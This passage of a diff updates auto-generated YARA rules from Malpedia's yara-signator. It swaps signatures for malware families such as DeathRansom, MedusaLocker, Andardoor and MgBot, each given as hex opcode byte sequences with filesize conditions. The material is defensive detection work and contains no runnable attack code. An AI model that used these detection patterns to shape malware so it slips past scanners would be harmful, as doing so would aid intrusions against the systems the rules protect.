 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50ee2015-88b7-58a2-ad62-287a84416fd8"
+		id = "15a5fdcc-983f-545a-acdb-1425e0080fb1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deathransom_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.supper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.supper_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "4fbf584c560c10f65d1ed9a5619731c7c654805433383d8df8efbda5a45512a6"
+		logic_hash = "609470a8924c4445e40bf6082d5cbc00c8d1a1556bb0036cf2444493aad439fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102035,32 +102228,38 @@ rule MALPEDIA_Win_Deathransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668945d8 8d55d8 8b45f4 52 6a00 68???????? 8b08 }
-		$sequence_1 = { 03d6 8bc1 8b75c8 03da c1c00d 8bd1 }
-		$sequence_2 = { 8b75d4 c1c90e 33c8 836dc001 894ddc 894dbc 8b4df8 }
-		$sequence_3 = { ffd7 50 ffd6 ff75d8 6a00 ffd7 50 }
-		$sequence_4 = { 894108 eb03 8b7df8 56 6a00 ff15???????? 8b35???????? }
-		$sequence_5 = { 33c8 8bc3 034dcc 33c6 2345e4 33c3 03c1 }
-		$sequence_6 = { f7d8 837b0400 5f 0f4dc6 5e 894304 5b }
-		$sequence_7 = { 894db8 0fb64a38 c1e108 0bc8 0fb6423a c1e108 0bc8 }
-		$sequence_8 = { 33c8 8b7de4 03ca 8b5df4 8b55dc 8bc6 }
-		$sequence_9 = { 33c2 8b55dc 8945e4 8d0413 c1c007 3345cc 03d0 }
+		$sequence_0 = { baffffffff 89cb 488b0d???????? ff15???????? }
+		$sequence_1 = { 74ed 8844242f e8???????? 0fb644242f 48c705????????00000000 4883c438 }
+		$sequence_2 = { 488905???????? e8???????? 84c0 7407 4883c438 5b }
+		$sequence_3 = { 488905???????? ffd6 48891d???????? 488905???????? }
+		$sequence_4 = { 4889cb 31c9 ffd6 4531c0 31d2 31c9 }
+		$sequence_5 = { 488905???????? 31c0 4883c428 5b 5e c3 }
+		$sequence_6 = { ba01000000 4c8b25???????? 41ffd4 85c0 }
+		$sequence_7 = { 4531c0 488b4b08 ba01000000 41ffd4 85c0 }
+		$sequence_8 = { e8???????? 488b4510 488b00 4885c0 }
+		$sequence_9 = { 0fb700 0fb7d0 488b85c0000000 4883c004 4189d0 }
+		$sequence_10 = { 66894510 c645ff00 488b05???????? baffffffff }
+		$sequence_11 = { 4883bdc000000000 750a b800000000 e9???????? 488b85c0000000 }
+		$sequence_12 = { ba04000000 4889c1 e8???????? 488b85e0000000 }
+		$sequence_13 = { 4889c1 e8???????? 8b45dc 89c0 4889c1 e8???????? }
+		$sequence_14 = { c744242004000000 4989d1 41b801000000 ba06000000 4889c1 e8???????? }
+		$sequence_15 = { c3 55 4881ec50010000 488dac2480000000 48898de0000000 488b85e0000000 0fb7400c }
 
 	condition:
-		7 of them and filesize < 133120
+		7 of them and filesize < 517120
 }
-rule MALPEDIA_Win_Shakti_Auto : FILE
+rule MALPEDIA_Win_Sneepy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "46b500e9-a975-5cdc-a985-5108deee61aa"
+		id = "c029590c-a1be-50f8-80cf-c12927fcf1f6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shakti_auto.yar#L1-L175"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sneepy_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "b5c0b26c5dc41457d9e16bd381b5ef6f5c4b5edd5ff24e7078690fca0d450c8b"
+		logic_hash = "978ba91f40e008ec1e688527edb2f9c28d926adc71b28f1ad0432cb8831f1c4c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102074,38 +102273,32 @@ rule MALPEDIA_Win_Shakti_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894df0 e9???????? 8b55fc 83c214 }
-		$sequence_1 = { 894dfc e9???????? 8b55f8 8b45d8 }
-		$sequence_2 = { 8945ec 8b4dec 8b55c0 0311 8955d0 8b45d0 8b4dc0 }
-		$sequence_3 = { 894dcc 8b55fc 83c208 8955f0 8b45cc }
-		$sequence_4 = { 8b4de0 8b11 8955e0 e9???????? 8b45d8 }
-		$sequence_5 = { 894df0 8b55fc 8b45d8 034210 8945e0 8b4de0 }
-		$sequence_6 = { 0311 8b45e0 8910 eb1e 8b4de0 8b55d8 0311 }
-		$sequence_7 = { 8955f8 8b45f8 813850450000 7502 eb0b 8b4dc0 83e901 }
-		$sequence_8 = { ff75f4 8b35???????? ffd6 53 ff750c 8945f4 }
-		$sequence_9 = { 50 ff7594 e8???????? 2b7598 ff7598 }
-		$sequence_10 = { 8945f8 8b801c090000 8945fc ff75f8 68edacef0d 8b45fc ffd0 }
-		$sequence_11 = { 894810 894808 c3 56 }
-		$sequence_12 = { 3b1cfdb0a24000 7409 47 897dfc 83ff17 72ee 83ff17 }
-		$sequence_13 = { 66837d6c01 7308 893d???????? eb14 8b07 a3???????? 833d????????ff }
-		$sequence_14 = { 83ec1c 53 8b1d???????? 85db 0f84dd000000 8d45e4 }
-		$sequence_15 = { 0f848a000000 ff750c 8d45f8 ff7508 8d4df0 e8???????? }
+		$sequence_0 = { 51 c3 8bff 55 8bec b8e41a0000 e8???????? }
+		$sequence_1 = { 6888130000 ffd6 68???????? c705????????e8d44000 e8???????? 83c404 }
+		$sequence_2 = { 8b4dfc 33c0 83ff01 5b 0f94c0 }
+		$sequence_3 = { c1fa05 8b149560314100 59 c1e006 59 8a4dff 80c901 }
+		$sequence_4 = { 52 8945dc c745c801000000 8975cc }
+		$sequence_5 = { 89b5c0feffff 46 83fe07 7cdf }
+		$sequence_6 = { 85c0 7459 81bdb0feffffc8000000 7526 8b3d???????? 8d8dc0feffff 51 }
+		$sequence_7 = { e8???????? 8bc6 c1f805 8b048560314100 }
+		$sequence_8 = { 83e103 f3a4 8d8df0feffff 68???????? 51 e8???????? }
+		$sequence_9 = { 33c0 8945e4 83f805 7d10 668b4c4310 66890c4514314100 }
 
 	condition:
-		7 of them and filesize < 191488
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Chinad_Auto : FILE
+rule MALPEDIA_Win_Romeos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bcb15e04-b813-5c23-a320-19f34e438aaa"
+		id = "57e36ea9-25df-5535-9507-4e3e8861391a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chinad_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.romeos_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "68dce9aa3cd2233ae8311dfd66d73079e3ad26ce882f6e912148b0f3a7f1f190"
+		logic_hash = "b103a70d5f0d023abb4fa14da56c910d4eba9e43552b97af05cf92b055758e46"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102119,32 +102312,32 @@ rule MALPEDIA_Win_Chinad_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0facde15 83c007 c1fb15 50 89b574ffffff 899d44ffffff e8???????? }
-		$sequence_1 = { 2385d4feffff 8d93f36f2e68 8985d8feffff 8bc6 2385b8feffff 0985d8feffff 8bc7 }
-		$sequence_2 = { c64418050a 745a 8b048d88ec4300 8a441825 3c0a }
-		$sequence_3 = { 8d8534ffffff 50 e8???????? 8d8534ffffff 50 e8???????? 83c430 }
-		$sequence_4 = { 13bd2cfdffff 81c3281e6323 81d7faffbe90 019d14fdffff 11bd38fdffff }
-		$sequence_5 = { 898508fdffff 8b8514fdffff 33ff 898d2cfdffff 33d2 8b8d38fdffff }
-		$sequence_6 = { 0facca08 8975fc c1e908 8850f8 8bce 8bd3 0facca10 }
-		$sequence_7 = { 50 e8???????? 8b4dec 33c8 8b4514 03c1 894dec }
-		$sequence_8 = { 8b8d9cfeffff 898d9cfeffff 8b9594feffff 899590feffff 8b8598feffff 898594feffff 8b8da4feffff }
-		$sequence_9 = { 8b8520fdffff 0bd1 319508fdffff 33d2 8b8d18fdffff 8bf1 0fa4c119 }
+		$sequence_0 = { 5e 5d 5b 81c438200000 c20400 5f 5e }
+		$sequence_1 = { 83c408 807c24480e 7406 43 83fb08 7cb6 e8???????? }
+		$sequence_2 = { 85c0 0f85ef000000 85db 751d 807c244802 0f85e0000000 }
+		$sequence_3 = { 50 bd30000000 e8???????? 8bbc2454200000 }
+		$sequence_4 = { 83c408 807c24480e 7406 43 }
+		$sequence_5 = { 7406 43 83fb08 7cb6 e8???????? 99 }
+		$sequence_6 = { 6a16 8d4c244c 6800200000 51 }
+		$sequence_7 = { 81c438200000 c20400 5f 5e }
+		$sequence_8 = { 8bf1 57 b9ff070000 33c0 8d7c2449 c644244800 6a16 }
+		$sequence_9 = { 0f850d010000 33db 6a16 8d4c244c 6800200000 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Mmon_Auto : FILE
+rule MALPEDIA_Win_Stormwind_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4eb1ee5b-1ba9-50c6-ae95-4549a25a6630"
+		id = "5af12011-3b11-5340-9f55-c2d59a09e295"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mmon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mmon_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stormwind_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "76045ffea1c47426874a11f386aa4b20c1d58a676ebe84d462f434375b141ab2"
+		logic_hash = "0edc5101ea908b3c6d0ede012ca9b7d0ba4e1d8697013b724d36791523c87635"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102158,34 +102351,34 @@ rule MALPEDIA_Win_Mmon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf8 8b4710 3bc8 770d 83c8ff 8bf7 e8???????? }
-		$sequence_1 = { 837e0800 7610 8b4608 8d80ec584200 fe08 803800 }
-		$sequence_2 = { e8???????? ebd2 8bc3 c1f805 8d3c85606a4200 8bf3 83e61f }
-		$sequence_3 = { ff15???????? 899ec0000000 899ec4000000 c786c8000000e0e74100 c786cc00000068ec4100 c786d0000000e8ed4100 }
-		$sequence_4 = { 68???????? 8d4df4 51 c745f440e24100 }
-		$sequence_5 = { 8bc8 894de4 85c9 747b 8b55d4 85d2 }
-		$sequence_6 = { 83e71f c1e706 8b0485606a4200 8d44380c }
-		$sequence_7 = { 8bc8 c1f905 8d3c8d606a4200 8bf0 83e61f c1e606 8b0f }
-		$sequence_8 = { 8b0d???????? 85c9 7406 8b55ec }
-		$sequence_9 = { 6a00 8bf1 c745d000000000 ff15???????? 8bf8 33c0 4f }
+		$sequence_0 = { eb87 85db 7483 8b7d08 8d7308 }
+		$sequence_1 = { 83663800 83630800 e8???????? e8???????? c3 833d????????00 746e }
+		$sequence_2 = { eb5c 8b45f4 8b0c85d8310510 f644190448 7437 8a06 }
+		$sequence_3 = { 8908 8d5602 8d4d0c e8???????? 8d4df0 83c404 }
+		$sequence_4 = { 8b06 83c41c 8bc8 8d7901 }
+		$sequence_5 = { e9???????? c745dca43e0410 8b4508 8b7510 dd00 dc4df8 }
+		$sequence_6 = { 8b7510 85f6 0f847f010000 8b5e14 85db 0f8874010000 }
+		$sequence_7 = { 53 e8???????? 8bf0 83c404 8975e8 6a00 6a00 }
+		$sequence_8 = { 751b 8b450c 891f 8918 8bc7 8b4df4 }
+		$sequence_9 = { 8bf8 59 83ffff 7407 8b34bd286c0410 56 e8???????? }
 
 	condition:
-		7 of them and filesize < 356352
+		7 of them and filesize < 741376
 }
-rule MALPEDIA_Win_Heriplor_Auto : FILE
+rule MALPEDIA_Win_Andardoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fea80a8c-f479-5ce5-81b4-e326d3255abd"
+		id = "36610ce1-8689-5760-8490-3c048dd08128"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.heriplor_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.andardoor_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "bcabe5553c3788da5ec383050fc0580bed7efb49f5fdd5cfd8664f6ebd97276a"
+		logic_hash = "77bea7a2d8aed8c22ef97e06e53b736b63004170333d5461958719ea43d8bb7c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102197,32 +102390,32 @@ rule MALPEDIA_Win_Heriplor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 84c9 740d 80c960 01cb }
-		$sequence_1 = { 56 57 33c9 648b4130 8b400c }
-		$sequence_2 = { 7420 46 46 46 46 }
-		$sequence_3 = { 8a08 84c9 740d 80c960 }
-		$sequence_4 = { 8b0491 01f8 5f 5e 89ec 5d c20800 }
-		$sequence_5 = { 43 ebe6 33d2 668b13 }
-		$sequence_6 = { 3b5d0c 7401 40 5b 59 89ec 5d }
-		$sequence_7 = { 5d c20c00 55 89e5 56 57 33c9 }
-		$sequence_8 = { 01fb 8b32 01fe 6a01 ff750c 56 e8???????? }
-		$sequence_9 = { 43 ebe6 33d2 668b13 8b0491 01f8 }
+		$sequence_0 = { e8???????? eb7d 33d2 488d8db0030000 41b808020000 e8???????? 33d2 }
+		$sequence_1 = { 90 0fb7840da8030000 6689840dd0040000 488d4902 6685c0 75e7 }
+		$sequence_2 = { 75f4 4c8d043f 488d9560030000 488d4c2468 e8???????? 488b35???????? }
+		$sequence_3 = { 488b05???????? 4833c4 4889842450400000 33c0 }
+		$sequence_4 = { 482bfe 0f1f4000 660f1f840000000000 0fb701 }
+		$sequence_5 = { 4d894bc8 458a4b28 498943e8 488b8424b0000000 498953b8 498d53b8 4d8943c0 }
+		$sequence_6 = { 488d4c2440 ff15???????? 85c0 7551 }
+		$sequence_7 = { 488bc8 e8???????? e8???????? 488b0d???????? 488d542450 4881c108020000 c744245004010000 }
+		$sequence_8 = { 498bc8 498bd8 e8???????? 33c9 85c0 }
+		$sequence_9 = { 4883cfff 0f1f8000000000 664439647802 488d7f01 75f4 4c8d043f 488d9560030000 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 339968
 }
-rule MALPEDIA_Win_Medusalocker_Auto : FILE
+rule MALPEDIA_Win_Flash_Develop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9e990ab4-0b70-5ed2-9c4d-a3d81f9ab05c"
+		id = "4688ecaa-1305-56f1-b990-d34d1967b3cd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.medusalocker_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flash_develop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flash_develop_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "1656532605d9f1886fe3ced1ab1c80cac05eec34432a579d536b1abe4c8a22b3"
+		logic_hash = "1b0b49a0bdf8cbe355d0f549d184abf36cc5a8a27ac3e4b70ddcdc76ec6e38f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102236,34 +102429,34 @@ rule MALPEDIA_Win_Medusalocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c408 8b5004 52 8b00 50 8d4dd8 e8???????? }
-		$sequence_1 = { e8???????? c745fcffffffff 8d4d08 e8???????? 8a45eb }
-		$sequence_2 = { eb24 33c9 894ddc 8d4ddc e8???????? 8945e0 }
-		$sequence_3 = { 05c8000000 8bc8 e8???????? 6a10 e8???????? 83c404 8945ec }
-		$sequence_4 = { 8d45ec 50 8b4d08 e8???????? 8b4de8 }
-		$sequence_5 = { ff15???????? 85c0 7575 8b45c0 }
-		$sequence_6 = { 8b4dfc 8b11 8b4dfc 8b4210 ffd0 8be5 5d }
-		$sequence_7 = { 83ec0c 894dfc 8b45fc 50 8b4d08 51 e8???????? }
-		$sequence_8 = { e8???????? 50 8b4dd0 e8???????? 50 }
-		$sequence_9 = { e8???????? 8b4df0 e8???????? c745fcffffffff 8d4d08 e8???????? }
+		$sequence_0 = { 55 56 33c9 57 0fb68170034200 99 8bf0 }
+		$sequence_1 = { 33fa 0fa4f708 c1e608 8934cd40484800 99 }
+		$sequence_2 = { c78424c8020000e0b04600 c78424cc02000068df4600 c78424d0020000b40d4700 c78424d4020000503e4700 c78424d8020000446e4700 c78424dc0200000c9d4700 c78424e0020000b0cc4700 }
+		$sequence_3 = { 891ccd28184800 892ccd2c184800 0fa4f710 c1e610 33f0 33fa 0fa4f708 }
+		$sequence_4 = { 33fa c1e308 892ccd2c204800 8bef 0fa4f708 891ccd28204800 8bde }
+		$sequence_5 = { 893ccd44484800 8bf0 8bfa 0fa4f708 }
+		$sequence_6 = { 892ccd34204800 8bef 0fa4f708 33fa 891ccd30204800 8bde c1e608 }
+		$sequence_7 = { c7842464010000240a4200 c7842468010000043a4200 c784246c01000070694200 c7842470010000cc9a4200 }
+		$sequence_8 = { 0fb68170054200 33ea 0fa4dd10 33fa 99 8934cd28304800 }
+		$sequence_9 = { 893ccd44404800 83c104 81f900010000 0f8c39f8ffff 5f 5e 5d }
 
 	condition:
-		7 of them and filesize < 1433600
+		7 of them and filesize < 1111040
 }
-rule MALPEDIA_Win_Dizzyvoid_Auto : FILE
+rule MALPEDIA_Win_Mgbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db997ae6-872c-5121-a308-2ff2cf7909e7"
+		id = "dd03dc94-bb3a-5cad-8f13-4bbe4b7f90a6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dizzyvoid"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dizzyvoid_auto.yar#L1-L234"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mgbot_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "ee47377d576371e1f242f6668080ed5eb3d7f4fc6edffaf4a1f51714c1f6dc67"
+		logic_hash = "7310ce51cc81391fc78e9881bf8f490b2a783d4789728f7661df3e6bdca512d7"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102275,46 +102468,32 @@ rule MALPEDIA_Win_Dizzyvoid_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b8bd0000000 4885c9 7403 ff5350 }
-		$sequence_1 = { 41c1e11c c1e904 4403c9 498bc8 48c1e902 418bc1 48c1e802 }
-		$sequence_2 = { 48b865210b59c84216b2 4c2bc1 49f7e8 4903d0 }
-		$sequence_3 = { 48b865210b59c84216b2 48f7e9 4803d1 48c1fa07 }
-		$sequence_4 = { 48895c2430 44897c2428 48896c2420 448bce }
-		$sequence_5 = { 4889442428 c7442420f8080000 4c8d8da0050000 41b806000000 }
-		$sequence_6 = { 488b8bc8000000 ff5350 90 488b8bd0000000 ff5350 90 488b8bd8000000 }
-		$sequence_7 = { 0f118980000000 48898190000000 488d0557e5ffff 498b0b }
-		$sequence_8 = { 8bec 81ec34040000 53 56 57 8dbdccfbffff b90d010000 }
-		$sequence_9 = { 8b8d90fcffff 51 e8???????? 83c40c 8bf4 }
-		$sequence_10 = { 7320 8b859cfcffff 0fb68c05a8fcffff 83f104 8b959cfcffff }
-		$sequence_11 = { 8b4dfc 33cd e8???????? 81c434040000 3bec }
-		$sequence_12 = { 8bf4 ff9590fcffff 3bf4 e8???????? 33c0 52 8bcd }
-		$sequence_13 = { 8dbdccfbffff b90d010000 b8cccccccc f3ab a1???????? 33c5 8945fc }
-		$sequence_14 = { a1???????? a3???????? a1???????? c705????????2a134100 }
-		$sequence_15 = { c705????????2a134100 8935???????? a3???????? ff15???????? a3???????? 83f8ff 0f84c1000000 }
-		$sequence_16 = { e8???????? c70016000000 e8???????? ebb4 c745e4700a4100 a1???????? }
-		$sequence_17 = { 83e908 8d7608 660fd60f 8d7f08 8b048de81f4000 }
-		$sequence_18 = { 59 8365fc00 8b049d601c4100 f644380401 740b }
-		$sequence_19 = { c3 8b04c53cb04000 5d c3 55 8bec }
-		$sequence_20 = { 33f6 e8???????? 83c404 8bf8 6800100000 }
-		$sequence_21 = { 8d44242c 50 57 46 ffd3 85c0 75f3 }
-		$sequence_22 = { 888690f54000 46 ebe5 ff35???????? }
-		$sequence_23 = { 8b04b5601c4100 0500080000 3bc8 7324 66c74104000a }
+		$sequence_0 = { 8be5 5d c20800 6808020000 e8???????? }
+		$sequence_1 = { 6808020000 e8???????? 6804010000 8bf0 }
+		$sequence_2 = { 5d c20800 6808020000 e8???????? }
+		$sequence_3 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 e8???????? }
+		$sequence_4 = { 5b 8be5 5d c20800 6808020000 }
+		$sequence_5 = { 6808020000 e8???????? 6804010000 8bf0 6a00 }
+		$sequence_6 = { 0f8553ffffff 5f 33c0 5e }
+		$sequence_7 = { 8be5 5d c20800 6808020000 }
+		$sequence_8 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 }
+		$sequence_9 = { 5b 8be5 5d c20800 6808020000 e8???????? }
 
 	condition:
-		7 of them and filesize < 479232
+		7 of them and filesize < 1677312
 }
-rule MALPEDIA_Win_Boxcaon_Auto : FILE
+rule MALPEDIA_Win_Underminer_Ek_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a730ae2b-b623-5088-86a7-4d1a4eb89ea5"
+		id = "25419d82-2049-52ba-8173-e803bede2897"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.boxcaon_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.underminer_ek"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.underminer_ek_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "5b71da83cc61472fd3b6239fea0178674ab4b3cf9a9678dbeeda07cdd88e683a"
+		logic_hash = "cef777a253424ada6724fda25a7a7fc2a7d290e0894ee3bdc7ea6fd0d09bd9ea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102328,32 +102507,38 @@ rule MALPEDIA_Win_Boxcaon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466890b54000 6a0d e8???????? }
-		$sequence_1 = { 8bd3 66899424e0000000 5a 6a50 66899424e2000000 8bd1 66899424e4000000 }
-		$sequence_2 = { 8888b8b84000 40 ebe6 ff35???????? }
-		$sequence_3 = { 8bec 33c0 8b4d08 3b0cc5408a4000 740a }
-		$sequence_4 = { c78424980000003c000000 ff15???????? 56 33ff }
-		$sequence_5 = { e8???????? 84c0 741a 8d4c2410 8d8424d8020000 2bc1 }
-		$sequence_6 = { 89bc24ac000000 89b424b4000000 c78424980000003c000000 ff15???????? }
-		$sequence_7 = { 33c9 66890c06 68???????? 8d442414 50 e8???????? }
-		$sequence_8 = { 0020 1f 40 00441f40 0023 d18a0688078a 46 }
-		$sequence_9 = { 33c0 c7461407000000 668906 8b4508 8b5810 57 }
+		$sequence_0 = { 56 e8???????? 83c404 53 e8???????? 83c404 8b551c }
+		$sequence_1 = { 25ffff0000 3d4ee640bb 7404 3bc1 7501 }
+		$sequence_2 = { 83c40c 66394e06 894d10 7630 83c710 8b07 }
+		$sequence_3 = { 03c3 8901 eb18 3daafc0d7c }
+		$sequence_4 = { 7463 8b55f4 8b0495582c4300 f644382848 }
+		$sequence_5 = { 8ad0 8adc 88550f 807e0700 7417 0fb6813051fa7e 8a4dff }
+		$sequence_6 = { 6a06 53 ff7508 53 ff55f0 85c0 7c07 }
+		$sequence_7 = { 0f8535010000 83bd88feffff00 0f85a4040000 807d9a01 }
+		$sequence_8 = { 885c012e 8b0495582c4300 804c012d04 46 }
+		$sequence_9 = { c745f800000000 0f8444040000 837d3000 0f843a040000 }
+		$sequence_10 = { 0f8776050000 52 51 e8???????? 83c408 c745c000000000 }
+		$sequence_11 = { c745fc20000000 eb21 8bd0 83e220 }
+		$sequence_12 = { 3e58 3e7f3e 98 3e4a }
+		$sequence_13 = { 47 8d5101 0f1f8000000000 8a01 41 84c0 }
+		$sequence_14 = { 66895dc0 ff7508 895dec ab ff760c 895df8 ab }
+		$sequence_15 = { e8???????? 83c410 eb03 8d041a 5b 5d c3 }
 
 	condition:
-		7 of them and filesize < 256000
+		7 of them and filesize < 466944
 }
-rule MALPEDIA_Win_Lowzero_Auto : FILE
+rule MALPEDIA_Win_Dadstache_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ac2a079-cc7d-5a01-943f-6fc6cc4cbe31"
+		id = "b2a62577-cb7e-5e21-91ce-710fa4e05555"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowzero"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lowzero_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dadstache_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "f28e102152915a4d88e2eb7305099c61405576886b21971bd223760dea8f3689"
+		logic_hash = "73e72c498fc907fc6a73ed239a2f6863b09267af51df13ccdd17c0fe20abede8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102367,71 +102552,77 @@ rule MALPEDIA_Win_Lowzero_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5e 5b c70016000000 33c0 }
-		$sequence_1 = { 33c0 8be5 5d c3 e8???????? 5f 5e }
-		$sequence_2 = { 5d c3 8b4b3c 894df8 8d81f8000000 3bd0 72e0 }
-		$sequence_3 = { 2bce 894df0 8d9b00000000 8d1c31 ff7734 85c0 }
-		$sequence_4 = { 4b 75f7 8b4d0c 3b7dfc 0f8255feffff }
-		$sequence_5 = { 47 2bc8 8d4602 03c3 3b450c }
-		$sequence_6 = { 8b3e 0fb74706 3945f8 0f8c5affffff }
-		$sequence_7 = { 83fa40 7310 6a0d ff15???????? 5e 33c0 5b }
-		$sequence_8 = { 8b45f8 ff740854 51 56 }
-		$sequence_9 = { 8806 46 47 e9???????? 8bda }
